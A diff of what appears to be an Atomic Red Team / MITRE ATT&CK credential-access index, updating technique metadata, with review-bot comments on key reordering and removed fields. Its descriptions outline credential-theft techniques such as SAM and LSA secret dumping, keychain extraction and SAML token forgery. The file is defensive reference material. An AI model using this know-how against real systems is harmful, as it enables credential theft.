name: 'OS Credential Dumping: Security Account Manager'
description: "Adversaries may attempt to extract credential material from the
Security Account Manager (SAM) database either through in-memory techniques
@@ -73236,9 +73892,8 @@ credential-access:
url: https://github.com/Neohapsis/creddump7
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.002
atomic_tests:
- name: Registry dump of SAM, creds, and secrets
@@ -73444,7 +74099,7 @@ credential-access:
elevation_required: true
T1552.005:
technique:
- modified: '2023-03-21T13:56:27.910Z'
+ modified: '2024-10-15T16:24:20.219Z'
name: 'Unsecured Credentials: Cloud Instance Metadata API'
description: |
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.
@@ -73495,14 +74150,13 @@ credential-access:
url: https://krebsonsecurity.com/2019/08/what-we-can-learn-from-the-capital-one-hack/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.005
atomic_tests: []
T1555.002:
technique:
- modified: '2024-03-29T16:37:34.772Z'
+ modified: '2024-10-15T16:41:18.638Z'
name: Securityd Memory
description: |-
An adversary with root access may gather credentials by reading `securityd`’s memory. `securityd` is a service/daemon responsible for implementing security protocols such as encryption and authorization.(Citation: Apple Dev SecurityD) A privileged adversary may be able to scan through `securityd`'s memory to find the correct sequence of keys to decrypt the user’s logon keychain. This may provide the adversary with various plaintext passwords, such as those for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)
@@ -73536,8 +74190,8 @@ credential-access:
external_id: T1555.002
- source_name: External to DA, the OS X Way
description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
- source_name: Apple Dev SecurityD
description: Apple. (n.d.). Security Server and Security Agent. Retrieved
March 29, 2024.
@@ -73554,11 +74208,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1110.002:
technique:
- modified: '2023-03-30T21:01:48.643Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Brute Force: Password Cracking'
description: "Adversaries may use password cracking to attempt to recover usable
credentials, such as plaintext passwords, when credential material such as
@@ -73576,7 +74229,7 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Mohamed Kmal
x_mitre_deprecated: false
@@ -73593,10 +74246,10 @@ credential-access:
- Linux
- macOS
- Windows
- - Office 365
- - Azure AD
- Network
- x_mitre_version: '1.2'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'User Account: User Account Authentication'
- 'Application Log: Application Log Content'
@@ -73620,7 +74273,6 @@ credential-access:
url: https://en.wikipedia.org/wiki/Password_cracking
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1110.002
atomic_tests:
- name: Password Cracking with Hashcat
@@ -73670,41 +74322,8 @@ credential-access:
elevation_required: true
T1555.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
- created: '2020-02-12T18:55:24.728Z'
- x_mitre_version: '1.1'
- external_references:
- - source_name: mitre-attack
- external_id: T1555.001
- url: https://attack.mitre.org/techniques/T1555/001
- - source_name: External to DA, the OS X Way
- url: http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way
- description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
- DA, the OS X Way. Retrieved July 3, 2017.
- - source_name: Keychain Services Apple
- url: https://developer.apple.com/documentation/security/keychain_services
- description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
- - source_name: Empire Keychain Decrypt
- url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
- description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
- Retrieved April 14, 2022.
- - source_name: OSX Keychain Schaumann
- url: https://www.netmeister.org/blog/keychain-passwords.html
- description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
- store and retrieve passwords. Retrieved March 31, 2022.
- - source_name: Keychain Decryption Passware
- url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
- description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
- Retrieved April 13, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-15T16:35:39.985Z'
+ name: 'Credentials from Password Stores: Keychain'
description: "Adversaries may acquire credentials from Keychain. Keychain (or
Keychain Services) is the macOS credential management system that stores account
names, passwords, private keys, certificates, sensitive application data,
@@ -73725,65 +74344,62 @@ credential-access:
file. Both methods require a password, where the default password for the
Login Keychain is the current user’s password to login to the macOS host.(Citation:
External to DA, the OS X Way)(Citation: Empire Keychain Decrypt) "
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Credentials from Password Stores: Keychain'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_deprecated: false
x_mitre_detection: Unlocking the keychain and using passwords from it is a very
common process, so there is likely to be a lot of noise in any detection technique.
Monitoring of system calls to the keychain can help determine if there is
a suspicious process trying to access it.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
- 'Process: OS API Execution'
- 'File: File Access'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1eaebf46-e361-4437-bc23-d5d65a3b92e3
+ created: '2020-02-12T18:55:24.728Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1555/001
+ external_id: T1555.001
+ - source_name: External to DA, the OS X Way
+ description: Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to
+ DA, the OS X Way. Retrieved September 12, 2024.
+ url: https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418
+ - source_name: Keychain Services Apple
+ description: Apple. (n.d.). Keychain Services. Retrieved April 11, 2022.
+ url: https://developer.apple.com/documentation/security/keychain_services
+ - source_name: Empire Keychain Decrypt
+ description: Empire. (2018, March 8). Empire keychaindump_decrypt Module.
+ Retrieved April 14, 2022.
+ url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/keychaindump_decrypt.py
+ - source_name: OSX Keychain Schaumann
+ description: Jan Schaumann. (2015, November 5). Using the OS X Keychain to
+ store and retrieve passwords. Retrieved March 31, 2022.
+ url: https://www.netmeister.org/blog/keychain-passwords.html
+ - source_name: Keychain Decryption Passware
+ description: Yana Gourenko. (n.d.). A Deep Dive into Apple Keychain Decryption.
+ Retrieved April 13, 2022.
+ url: https://support.passware.com/hc/en-us/articles/4573379868567-A-Deep-Dive-into-Apple-Keychain-Decryption
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1555.001
atomic_tests: []
T1003.004:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Ed Williams, Trustwave, SpiderLabs
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
- type: attack-pattern
- created: '2020-02-21T16:22:09.493Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1003.004
- url: https://attack.mitre.org/techniques/T1003/004
- - source_name: Passcape LSA Secrets
- url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
- description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
- 2020.
- - source_name: Microsoft AD Admin Tier Model
- url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
- description: Microsoft. (2019, February 14). Active Directory administrative
- tier model. Retrieved February 21, 2020.
- - source_name: Tilbury Windows Credentials
- url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
- description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
- Mitigation, Defense. Retrieved February 21, 2020.'
- - source_name: ired Dumping LSA Secrets
- url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
- description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
- Retrieved February 21, 2020.
- - url: https://github.com/mattifestation/PowerSploit
- description: PowerSploit. (n.d.). Retrieved December 4, 2014.
- source_name: Powersploit
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-13T15:49:17.591Z'
name: 'OS Credential Dumping: LSA Secrets'
description: |-
Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts.(Citation: Passcape LSA Secrets)(Citation: Microsoft AD Admin Tier Model)(Citation: Tilbury Windows Credentials) LSA secrets are stored in the registry at HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets
. LSA secrets can also be dumped from memory.(Citation: ired Dumping LSA Secrets)
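Review bot: `spec_version: '2.1'` is removed from the T1555.001 technique object (the `- spec_version: '2.1'` line just before `identifier: T1555.001`) with nothing replacing it, and the same removal recurs for every technique touched by this patch; if any consumer reads the STIX `spec_version` from the individual technique objects rather than from the enclosing bundle, it will now find no value, so either confirm nothing depends on it or keep the key. The rest of the hunk is a key reorder plus the `x_mitre_attack_spec_version` bump from 2.1.0 to 3.2.0 and the refreshed "External to DA, the OS X Way" reference (new slideshare URL, retrieved September 12, 2024), which is consistent with the new `modified` timestamp.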
@@ -73792,6 +74408,9 @@ credential-access:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_contributors:
+ - Ed Williams, Trustwave, SpiderLabs
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor processes and command-line arguments for program
execution that may be indicative of credential dumping. Remote access tools
may contain built-in features or incorporate existing tools like Mimikatz.
@@ -73799,16 +74418,47 @@ credential-access:
such as PowerSploit''s Invoke-Mimikatz module,(Citation: Powersploit) which
may require additional logging features to be configured in the operating
system to collect necessary information for analysis.'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Access'
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--1ecfdab8-7d59-4c98-95d4-dc41970f57fc
+ created: '2020-02-21T16:22:09.493Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1003/004
+ external_id: T1003.004
+ - source_name: Tilbury Windows Credentials
+ description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,
+ Mitigation, Defense. Retrieved February 21, 2020.'
+ url: https://www.first.org/resources/papers/conf2017/Windows-Credentials-Attacks-and-Mitigation-Techniques.pdf
+ - source_name: ired Dumping LSA Secrets
+ description: Mantvydas Baranauskas. (2019, November 16). Dumping LSA Secrets.
+ Retrieved February 21, 2020.
+ url: https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsa-secrets
+ - source_name: Microsoft AD Admin Tier Model
+ description: Microsoft. (2019, February 14). Active Directory administrative
+ tier model. Retrieved February 21, 2020.
+ url: https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material?redirectedfrom=MSDN
+ - source_name: Passcape LSA Secrets
+ description: Passcape. (n.d.). Windows LSA secrets. Retrieved February 21,
+ 2020.
+ url: https://www.passcape.com/index.php?section=docsys&cmd=details&id=23
+ - source_name: Powersploit
+ description: PowerSploit. (n.d.). Retrieved December 4, 2014.
+ url: https://github.com/mattifestation/PowerSploit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1003.004
atomic_tests:
- name: Dumping LSA Secrets
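Review bot: The typo "1Windows Credentials" in the Tilbury reference is carried over unchanged into the re-emitted `external_references` block (`description: 'Chad Tilbury. (2017, August 8). 1Windows Credentials: Attack,`); since the block is being rewritten anyway, drop the stray "1" so the title reads "Windows Credentials: Attack, Mitigation, Defense". Separately, `x_mitre_permissions_required: - SYSTEM` is removed while the description still opens with "Adversaries with SYSTEM access to a host"; if the permissions field is being retired across the data set that is acceptable, but note that the prerequisite then survives only in the atomic test's `elevation_required: true` at the end of this technique's tests.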
@@ -73859,17 +74509,18 @@ credential-access:
elevation_required: true
T1606.002:
technique:
- modified: '2024-03-01T17:55:56.116Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Forge Web Credentials: SAML token'
description: |-
An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the NotOnOrAfter
value of the conditions ...
element in a token. This value can be changed using the AccessTokenLifetime
in a LifetimeTokenPolicy
.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)
An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization's token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.
- An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
+ An adversary may gain administrative Entra ID privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: credential-access
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Blake Strom, Microsoft 365 Defender
- Oleg Kolesnikov, Securonix
@@ -73882,14 +74533,14 @@ credential-access:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Azure AD
- SaaS
- Windows
- - Office 365
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
- 'Web Credential: Web Credential Creation'
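Review bot: The platform list for T1606.002 drops `Azure AD`, `Office 365` and `Google Workspace` and adds `Office Suite` and `Identity Provider`; any per-platform index files generated from `x_mitre_platforms` must be regenerated in the same change, otherwise a Google Workspace or Office 365 index would still list this technique under a platform it no longer declares. The `x_mitre_version` bump from 1.3 to 1.4 goes with the content change in the preceding hunk (Azure AD renamed to Entra ID in the description), so the two hunks should land together rather than be split.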
@@ -73930,14 +74581,11 @@ credential-access:
url: https://www.sygnia.co/golden-saml-advisory
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1606.002
atomic_tests: []
T1003.007:
technique:
- modified: '2024-04-10T16:41:01.496Z'
+ modified: '2024-10-15T15:13:32.253Z'
name: 'OS Credential Dumping: Proc Filesystem'
description: |-
Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc//maps` file shows how memory is mapped within the process’s virtual address space. And `/proc//mem`, exposed for debugging purposes, provides access to the process’s virtual address space.(Citation: Picus Labs Proc cump 2022)(Citation: baeldung Linux proc map 2022)
@@ -74000,81 +74648,79 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1003.007
atomic_tests: []
T1555.005:
technique:
+ modified: '2024-08-19T13:53:33.661Z'
+ name: Password Managers
+ description: |-
+ Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
+
+ Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
+ Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: credential-access
+ x_mitre_contributors:
+ - Matt Burrough, @mattburrough, Microsoft
+ x_mitre_deprecated: false
+ x_mitre_detection: "Consider monitoring API calls, file read events, and processes
+ for suspicious activity that could indicate searching in process memory of
+ password managers. \n\nConsider monitoring file reads surrounding known password
+ manager applications."
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
x_mitre_platforms:
- Linux
- macOS
- Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Matt Burrough, @mattburrough, Microsoft
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
+ x_mitre_version: '1.1'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ - 'Process: OS API Execution'
+ - 'File: File Access'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--315f51f0-6b03-4c1e-bfb2-84740afb8e21
created: '2021-01-22T16:08:40.629Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1555.005
url: https://attack.mitre.org/techniques/T1555/005
- - source_name: ise Password Manager February 2019
- url: https://www.ise.io/casestudies/password-manager-hacking/
- description: 'ise. (2019, February 19). Password Managers: Under the Hood
- of Secrets Management. Retrieved January 22, 2021.'
+ external_id: T1555.005
+ - source_name: Cyberreason Anchor December 2019
+ description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
+ A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
+ 10, 2020.'
+ url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- source_name: FoxIT Wocao December 2019
- url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
description: 'Dantzig, M. v., Schamper, E. (2019, December 19). Operation
Wocao: Shining a light on one of China’s hidden hacking groups. Retrieved
October 8, 2020.'
+ url: https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf
+ - source_name: ise Password Manager February 2019
+ description: 'ise. (2019, February 19). Password Managers: Under the Hood
+ of Secrets Management. Retrieved January 22, 2021.'
+ url: https://www.ise.io/casestudies/password-manager-hacking/
- source_name: Github KeeThief
- url: https://github.com/GhostPack/KeeThief
description: Lee, C., Schoreder, W. (n.d.). KeeThief. Retrieved February 8,
2021.
+ url: https://github.com/GhostPack/KeeThief
- source_name: NVD CVE-2019-3610
- url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
description: National Vulnerability Database. (2019, October 9). CVE-2019-3610
Detail. Retrieved April 14, 2021.
- - source_name: Cyberreason Anchor December 2019
- url: https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware
- description: 'Dahan, A. et al. (2019, December 11). DROPPING ANCHOR: FROM
- A TRICKBOT INFECTION TO THE DISCOVERY OF THE ANCHOR MALWARE. Retrieved September
- 10, 2020.'
- modified: '2022-05-11T14:00:00.188Z'
- name: Password Managers
- description: |-
- Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)
-
- Adversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212).(Citation: NVD CVE-2019-3610)
- Adversaries may also try brute forcing via [Password Guessing](https://attack.mitre.org/techniques/T1110/001) to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: credential-access
- x_mitre_detection: "Consider monitoring API calls, file read events, and processes
- for suspicious activity that could indicate searching in process memory of
- password managers. \n\nConsider monitoring file reads surrounding known password
- manager applications."
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ url: https://nvd.nist.gov/vuln/detail/CVE-2019-3610
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'Process: Process Access'
- - 'Process: OS API Execution'
- - 'File: File Access'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1040:
technique:
- modified: '2024-04-19T12:32:44.370Z'
+ modified: '2024-10-15T15:11:55.217Z'
name: Network Sniffing
description: |-
Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
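Review bot: Almost all of this hunk is key reordering of the T1555.005 entry (the description, detection text and reference entries are identical on both sides, only their position moves), which buries the three substantive changes: `x_mitre_permissions_required: - User` is removed, `x_mitre_version` goes from 1.0 to 1.1, and `revoked: false` / `x_mitre_deprecated: false` are added. If the generator can emit keys in a stable order (for example sorted alphabetically), future refreshes would diff cleanly and reviewers could see the real changes at a glance instead of reading a 150-line rewrite of unchanged data.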
@@ -74159,7 +74805,6 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1040
atomic_tests:
- name: Packet Capture Windows Command Prompt
@@ -74279,7 +74924,7 @@ credential-access:
elevation_required: true
T1552.002:
technique:
- modified: '2023-07-28T18:29:56.525Z'
+ modified: '2024-10-15T16:26:46.873Z'
name: 'Unsecured Credentials: Credentials in Registry'
description: |-
Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
@@ -74328,9 +74973,8 @@ credential-access:
url: https://pentestlab.blog/2017/04/19/stored-credentials/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1552.002
atomic_tests:
- name: Enumeration for Credentials in Registry
@@ -74360,31 +75004,7 @@ credential-access:
name: command_prompt
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -74408,22 +75028,44 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
